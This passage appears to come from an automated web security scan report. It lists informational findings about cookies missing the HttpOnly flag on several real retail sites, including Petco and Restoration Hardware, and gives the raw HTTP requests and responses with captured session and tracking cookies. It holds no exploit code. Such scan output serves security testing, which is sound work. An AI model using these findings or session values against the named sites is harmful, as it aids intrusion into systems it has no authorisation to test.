P3P: policyref="/w3c/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
Cache-Control: no-store
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:54:27 GMT
Connection: close
Set-Cookie: CH=18654,53bro,18661,53bro,28363,53br0,22244,53br0,24785,53c27,24783,53c27,18653,53bro,33114,00000,24782,53c27,32619,00000,32620,00000; domain=.imiclk.com; path=/; expires=Tue, 15-May-2012 01:05:18 GMT
Set-Cookie: RQ=985,53bro,1445,53bro,1470,53c1h,1478,53bro,1513,53bro,1514,53bro,1515,53bro,2398,53bro,2570,53c1h,3173,53c1h,3190,53c1h,3238,53bro,3677,53bro,3678,53c1h,3387,53br2,3388,53brH,3389,53brJ,3390,53c1h,3391,53c27,1267,53br0,2831,53br0,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2; domain=.imiclk.com; path=/; expires=Tue, 15-May-2012 01:05:18 GMT
Content-Length: 224

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2//EN"><html><head><title></title></head><body>
<img src="http://pixel.mathtag.com/data/img?mt_id=100040&amp;mt_dcid=1305510867" alt="" border="0" width="1" h
...[SNIP]...

13.166. http://www.orderhouse.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orderhouse.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.orderhouse.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://www.orderhouse.com/default.aspx
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=l33k2h455vp2pnb3z2p44qqo; path=/; HttpOnly
Set-Cookie: AccountType=; expires=Wed, 16-Nov-2011 11:39:08 GMT; path=/
Set-Cookie: Pref=0; expires=Wed, 16-Nov-2011 11:39:08 GMT; path=/
Set-Cookie: InitialEventId=24102330; expires=Wed, 16-May-2012 10:39:08 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:39:07 GMT
Content-Length: 156

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.orderhouse.com/default.aspx">here</a>.</h2>
</body></html>

13.167. http://www.petco.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.petco.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444 HTTP/1.1
Host: www.petco.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP=CJ=1&CJExpiry=6/19/2011 6:42:10 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:42:10 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:42:10 PM&PID=2537521&AID=10413444; SL_Audience=423|Accelerated|92|7|0; SL_UVId=28F6BEFE806000C3; SL_NV7=1|7; CMAVID=none; cmTPSet=Y; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.1.10.1305510193; mt.v=1.1314269718.1305510194589; RES_TRACKINGID=256672559073194; RES_SESSIONID=18709185067564; ResonanceSegment=2; CoreAt=90002311=1|1|0|0|0|0|0|0|0|0|0|0|1|1305510189|14_16_18_20_21_22_25_|&; SAVId=vid%3DjAZPvJCAn9TzbA3IqjIS0BXWEqTAhP6H%3Bnvid%3D1%3Bcvid%3D1%3Bplen%3D88%3Bpid%3D55d11a247d01f4c640b3ba5752e78685d%3Bpdx%3D88%3Bglen%3D243%3Bgid%3Df47055609695b3445280ada1f0e6c4c5%3Bgdx%3D89%3Bpt%3D61781%3B; SASId=sid%3DVbDccytV4V9vowfK3PHnkrtcS6teMKbe%3Bcsid%3D1%3Bnsid%3D1%3Blut%3D1305510836562%3B

Response

HTTP/1.1 200 OK
P3P: CP="ALL DSP COR IVDi PSD PSA TELi TAIi ADM CUR CONi SAMi OUR IND PHY ONL UNI PUR COM NAV INT CNT PRE"
Location: http://www.petco.com:80/default.aspx?aid=10413444&pid=2537521&cm_mmc=cj-_-cid-_-2537521-_-10413444
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-SL-CompState: Compiled
X-Strangeloop: ViewState,Compression
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:57:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: MP=CJ=1&CJExpiry=6/19/2011 6:56:15 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:56:15 PM; domain=.petco.com; expires=Sun, 14-Aug-2011 01:56:15 GMT; path=/
Set-Cookie: Basket=AffiliateCJExpiryDate=6/19/2011 6:56:15 PM&PID=2537521&AID=10413444; domain=.petco.com; expires=Tue, 16-Aug-2011 01:56:15 GMT; path=/
Set-Cookie: SL_UVId=28F6BEFE806000C3;path=/;
Set-Cookie: sltest=T; path=/; domain=petco.com.
Content-Length: 97339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...

13.168. http://www.petco.com/Secure/Login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.petco.com
Path:   /Secure/Login.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Secure/Login.aspx?ReturnUrl=/Secure/YourAccount.aspx HTTP/1.1
Host: www.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; CMAVID=none; cmTPSet=Y; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; SL_UVId=28F6BEFE806000C3; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; SASId=sid%3DVbDccytV4V9vowfK3PHnkrtcS6teMKbe%3Bcsid%3D2%3Bnsid%3D0%3Blut%3D1305510840147%3B; SAVId=vid%3DjAZPvJCAn9TzbA3IqjIS0BXWEqTAhP6H%3Bnvid%3D0%3Bcvid%3D1%3Bplen%3D88%3Bpid%3D55d11a247d01f4c640b3ba5752e78685d%3Bpdx%3D88%3Bglen%3D233%3Bgid%3Dc3089e6d97b75860d4a6aed45da60c42%3Bgdx%3D233%3Bpt%3D46830%3B; CoreAt=90002311=1|2|0|0|0|0|0|0|0|0|0|0|1|1305510189|14_16_18_20_21_22_25_|&; cmRS=&t1=1305510842039&t2=1305510887898&t3=1305511397575&t4=1305510840070&lti=1305511397570&ln=&hr=http%3A//www.petco.com/Secure/Login.aspx%3FReturnUrl%3D/Secure/YourAccount.aspx&fti=&fn=%3A0%3B%3A1%3B%3A2%3B%3A3%3B&ac=&fd=&uer=&fu=&pi=HOME%20PAGE&ho=customerappreciation.petco.com/cm%3F&ci=90002311

Response

HTTP/1.1 200 OK
P3P: CP="ALL DSP COR IVDi PSD PSA TELi TAIi ADM CUR CONi SAMi OUR IND PHY ONL UNI PUR COM NAV INT CNT PRE"
Location: http://www.petco.com:80/secure/login.aspx?returnurl=/secure/youraccount.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:13:19 GMT
Connection: close
Set-Cookie: SL_UVId=28F6BEFE806000C3;path=/;
Set-Cookie: sltest=T; path=/; domain=petco.com.
Content-Length: 43574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...

13.169. http://www.redcrossstore.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcrossstore.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.redcrossstore.org
Proxy-Connection: keep-alive
Referer: http://american.redcross.org/site/PageServer?pagename=ntld_main
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ihgw4r55c5v3o245hxpjpj3h; path=/; HttpOnly
Set-Cookie: AccountType=; expires=Wed, 16-Nov-2011 03:07:39 GMT; path=/
Set-Cookie: Pref=0; expires=Wed, 16-Nov-2011 03:07:39 GMT; path=/
Set-Cookie: InitialEventId=24098233; expires=Wed, 16-May-2012 02:07:39 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 02:07:38 GMT
Content-Length: 48252


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html style="margin: 0px">
   <head>
<meta http-equiv="content-type" conten
...[SNIP]...

13.170. http://www.restorationhardware.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.restorationhardware.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.restorationhardware.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; TS1c138a=3df5ee0d2da226cbb8724d51bbf2990e2efa223a5124b4964dd084fd; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.1.10.1305509985; engagement=1; promobanner=viewed; fsr.s={"v":1,"rid":"1305509997099_983249","pv":1,"to":3,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:53:12 GMT
Connection: close
Set-Cookie: TS1c138a=b6e810b3b0486de55c7dc77610c783822efa223a5124b4964dd08831; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 01:53:12 GMT
Content-Length: 20537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">    
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
           <hea
...[SNIP]...

13.171. http://www.restorationhardware.com/content/promo.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.restorationhardware.com
Path:   /content/promo.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/promo.jsp?id=138040&&link=SFGalleryStore HTTP/1.1
Host: www.restorationhardware.com
Proxy-Connection: keep-alive
Referer: http://www.restorationhardware.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=b6e810b3b0486de55c7dc77610c783822efa223a5124b4964dd08831; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.2.10.1305509985; engagement=2; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305510793290}; cmRS=&t1=1305510801743&t2=1305510806096&t3=1305511157555&t4=1305510793293&lti=1305511157555&ln=134006&hr=%3Fid%3D138040%26%26link%3DSFGalleryStore&fti=&fn=&ac=&fd=&uer=&fu=&pi=HOME%20PAGE&ho=cimg-1.restorationhardware.com/cm%3F&ci=90007517

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:09:21 GMT
Connection: close
Set-Cookie: TS1c138a=7b67f70a184190a3c9165eedcfa7ec9d2efa223a5124b4964dd08bf9; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:09:21 GMT
Content-Length: 18688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">    
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
           <hea
...[SNIP]...

13.172. http://www.restorationhardware.com/sitewide/data/json/profile-status.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.restorationhardware.com
Path:   /sitewide/data/json/profile-status.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitewide/data/json/profile-status.jsp?_=1305511158926 HTTP/1.1
Host: www.restorationhardware.com
Proxy-Connection: keep-alive
Referer: http://www.restorationhardware.com/content/promo.jsp?id=138040&&link=SFGalleryStore
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.2.10.1305509985; engagement=2; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757}; fsr.a=1305511158906

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: application/json;charset=ISO-8859-1
Content-Length: 94
Date: Mon, 16 May 2011 02:09:31 GMT
Connection: close
Set-Cookie: TS1c138a=16ae58c88b9208479319a154d9def7682efa223a5124b4964dd08c04; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:09:31 GMT


{"status":"-1","cartCount":"0"
   ,"wishList":"gl390568157"
   ,"giftLists":[]
   ,"firstName":""}

13.173. https://www.restorationhardware.com/my-account/forgot-password.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /my-account/forgot-password.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /my-account/forgot-password.jsp HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; engagement=4; fsr.s={"v":1,"rid":"1305509997099_983249","pv":3,"to":5,"c":"https://www.restorationhardware.com/my-account/sign-in.jsp","lc":{"d0":{"v":3,"s":false,"e":1}},"cd":0,"sd":0,"f":1305511158757,"cp":{"my-account":"visited"}}; cmRS=&t1=1305511192547&t2=1305511197283&t3=1305541160118&fti=&fn=UNDEFINED%3A0%3B&ac=&fd=&uer=&fu=&pi=my-account%20sign-in&ho=cimg-1.restorationhardware.com/cm%3F&ci=90007517&ul=https%3A//www.restorationhardware.com&rf=http%3A//www.restorationhardware.com/content/promo.jsp%3Fid%3D138040%26%26link%3DSFGalleryStore

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:24:01 GMT
Connection: keep-alive
Set-Cookie: TS1c138a=b72ce5406b61a765c4dbe2b4990160aa2efa223a5124b4964dd0ffea; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 10:24:00 GMT
Content-Length: 17767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">    
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
           <hea
...[SNIP]...

13.174. https://www.restorationhardware.com/my-account/register.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /my-account/register.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /my-account/register.jsp HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/forgot-password.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; TS1c138a=27552492896cbb9145e280ea3c546c112efa223a5124b4964dd0fed4; engagement=5; fsr.s={"v":1,"rid":"1305509997099_983249","pv":4,"to":5,"c":"https://www.restorationhardware.com/my-account/forgot-password.jsp","lc":{"d0":{"v":4,"s":true,"e":2}},"cd":0,"sd":0,"f":1305541164254,"cp":{"my-account":"visited"}}; cmRS=&t1=1305541182545&t2=1305541183619&t3=1305541273137&t4=1305541164256&fti=&fn=requestPassword%3A0%3B&ac=&fd=&uer=&fu=&pi=my-account%20forgot-password&ho=cimg-1.restorationhardware.com/cm%3F&ci=90007517

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:32:23 GMT
Connection: keep-alive
Set-Cookie: TS1c138a=c8ca4c79fc3e7bb28d932b5bb1dcf3292efa223a5124b4964dd101e1; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 10:32:23 GMT
Content-Length: 20125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">    
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
           <hea
...[SNIP]...

13.175. https://www.restorationhardware.com/my-account/sign-in.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /my-account/sign-in.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /my-account/sign-in.jsp?link=topnav_signin HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: http://www.restorationhardware.com/content/promo.jsp?id=138040&&link=SFGalleryStore
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757}; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; engagement=3; fsr.a=1305511164164

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:09:55 GMT
Connection: keep-alive
Set-Cookie: TS1c138a=ef27e626254569019b6a3249227030c92efa223a5124b4964dd08c1b; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:09:55 GMT
Content-Length: 19152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">    
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
           <hea
...[SNIP]...

13.176. https://www.restorationhardware.com/sitewide/data/json/profile-status.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /sitewide/data/json/profile-status.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitewide/data/json/profile-status.jsp?_=1305511192551 HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; engagement=3; fsr.a=1305511192538; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757,"cp":{"my-account":"visited"}}

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: application/json;charset=ISO-8859-1
Content-Length: 94
Date: Mon, 16 May 2011 02:10:10 GMT
Connection: keep-alive
